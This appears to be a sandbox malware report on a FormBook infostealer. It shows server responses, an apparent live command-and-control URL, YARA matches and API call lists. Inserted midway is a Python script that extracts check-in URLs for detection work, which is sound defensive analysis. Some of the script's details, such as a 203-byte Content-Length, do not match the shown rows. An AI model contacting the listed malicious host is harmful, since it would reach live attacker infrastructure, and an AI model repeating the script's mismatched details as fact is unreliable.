65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: yRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kalomor.top
Source: yRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kalomor.top/1i25/
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: at.exe, 00000003.00000002.3549391269.0000000004C8E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000380E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: at.exe, 00000003.00000002.3549391269.000000000591E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000449E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033~7$
Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: at.exe, 00000003.00000003.2133197584.0000000008465000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: at.exe, 00000003.00000002.3549391269.00000000047D8000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.0000000003358000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.0000000038FF8000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: at.exe, 00000003.00000002.3549391269.00000000055FA000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3551318887.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000417A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
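The traffic rows above show only the server side of FormBook's check-ins: every contacted host answers 404, the Apache/CentOS body echoes the requested path (/6m23/), and the memory strings hold a second URL of the same shape (http://www.kalomor.top/1i25/). The script below is an added example, not part of the Joe Sandbox report: it decodes one Data Raw dump copied from the page, checks it against the Content-Length the report shows, recovers the echoed path from the 404 body, and filters the memory-string URLs with a heuristic for FormBook-style check-in URLs (plain http, a www. host, one short alphanumeric path segment with a trailing slash, no query). The path regex and the www. requirement are my generalisation of the two paths seen on this page, not a rule the report states, and a 404 on its own does not tell you which of the contacted hosts is the live C2.

```python
"""Added example: parse Joe Sandbox HTTP and memory-string rows for FormBook check-in URLs."""
import re
from urllib.parse import urlsplit

# Data Raw of the Apache/CentOS 404 row, copied from this report (Content-Length: 203).
APACHE_404_RAW = (
    "3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f "
    "44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a "
    "3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 "
    "65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 "
    "3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f "
    "74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f "
    "64 79 3e 3c 2f 68 74 6d 6c 3e 0a"
)
APACHE_404_CONTENT_LENGTH = 203

# Constructed sample: "String found in binary or memory" rows copied from this report.
MEMORY_ROWS = """
Source: yRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kalomor.top
Source: yRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kalomor.top/1i25/
Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: at.exe, 00000003.00000002.3549391269.0000000004C8E000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: at.exe, 00000003.00000002.3549391269.00000000055FA000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
"""

# Assumption (not from the report): check-in URLs on this page look like
# http://www.<host>/<short alnum>/ (/6m23/, /1i25/); treat that shape as a candidate.
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{2,8}/$")
MEMORY_URL = re.compile(r"String found in binary or memory:\s*(\S+)")
ECHOED_PATH = re.compile(rb"requested URL (\S+) was not found")


def decode_raw(hex_dump: str) -> bytes:
    """Turn the report's space-separated hex 'Data Raw' field back into bytes."""
    return bytes.fromhex(hex_dump)


def body_matches_length(hex_dump: str, content_length: int) -> bool:
    """Consistency check: the dump should be exactly Content-Length bytes long."""
    return len(decode_raw(hex_dump)) == content_length


def echoed_path(body: bytes):
    """Apache's default 404 page repeats the requested path; recover it, or None."""
    m = ECHOED_PATH.search(body)
    return m.group(1).decode("latin-1") if m else None


def looks_like_checkin(url: str) -> bool:
    """Heuristic from the lead-in: plain http, www. host, one short path segment, no query."""
    u = urlsplit(url)
    return (u.scheme == "http" and u.netloc.startswith("www.")
            and bool(CHECKIN_PATH.match(u.path)) and not u.query)


def memory_urls(rows: str) -> list:
    """Extract the URL from every memory-string row, whatever the cell separator."""
    found = []
    for line in rows.splitlines():
        m = MEMORY_URL.search(line)
        if m:
            found.append(m.group(1))
    return found


def checkin_candidates(rows: str) -> list:
    """Memory-string URLs that fit the check-in shape, in report order."""
    return [url for url in memory_urls(rows) if looks_like_checkin(url)]


if __name__ == "__main__":
    body = decode_raw(APACHE_404_RAW)
    print(body_matches_length(APACHE_404_RAW, APACHE_404_CONTENT_LENGTH), echoed_path(body))
    print(checkin_candidates(MEMORY_ROWS))
```

Run it as a script to see the length check, the echoed /6m23/ path and the single candidate URL; on a full report, feed every Data Raw dump and every memory-string row through the same functions and pivot on the recovered paths rather than on hostnames, since the path is what stays constant across the domains a FormBook sample cycles through.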

E-Banking Fraud

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C5B3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B14340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B14650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B135C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B139B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12FA0 NtQuerySection
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B12C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B13090 NtSetValueKey
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B13010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B13D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03B13D70 NtOpenThread
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03228FC0 NtReadFile
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03228E50 NtCreateFile
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_032292B0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_03229150 NtClose
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_032290B0 NtDeleteFile
